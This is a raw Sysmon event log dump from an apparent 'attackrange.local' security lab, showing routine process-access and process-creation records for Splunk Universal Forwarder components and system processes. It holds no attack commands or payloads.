10341000x8000000000000000805907Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:24.791{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F29C-60EB-3579-00000000D001}3120C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000805906Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:24.791{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F29C-60EB-3579-00000000D001}3120C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000805905Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:24.776{0C1E0330-F29C-60EB-3579-00000000D001}3120C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000805904Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:24.385{0C1E0330-F29C-60EB-3479-00000000D001}520868C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805903Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:24.244{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F29C-60EB-3479-00000000D001}520C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805902Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:43:24.244{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805901Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:24.244{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805900Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:43:24.244{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805899Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:24.244{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805898Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:43:24.244{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805897Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:24.229{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805896Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:43:24.229{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805895Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:24.229{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805894Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:43:24.229{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805893Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:24.229{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F29C-60EB-3479-00000000D001}520C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000805892Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:24.229{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F29C-60EB-3479-00000000D001}520C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000805891Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:24.230{0C1E0330-F29C-60EB-3479-00000000D001}520C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001045751Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:25.944{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9BBB617AA2DDC13B42D03DFE664CE410,SHA256=64CA713F3986D63CAA606AFECBCC85E296D7A14FBAEB28FC8049B39D0BF3F526,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000805935Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:43:25.651{0C1E0330-F29D-60EB-3679-00000000D001}25563908C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805934Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:25.479{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F29D-60EB-3679-00000000D001}2556C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805933Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:43:25.479{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805932Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:25.479{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805931Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:43:25.479{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805930Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:25.479{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805929Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:43:25.479{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805928Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:25.479{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805927Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:43:25.479{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805926Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 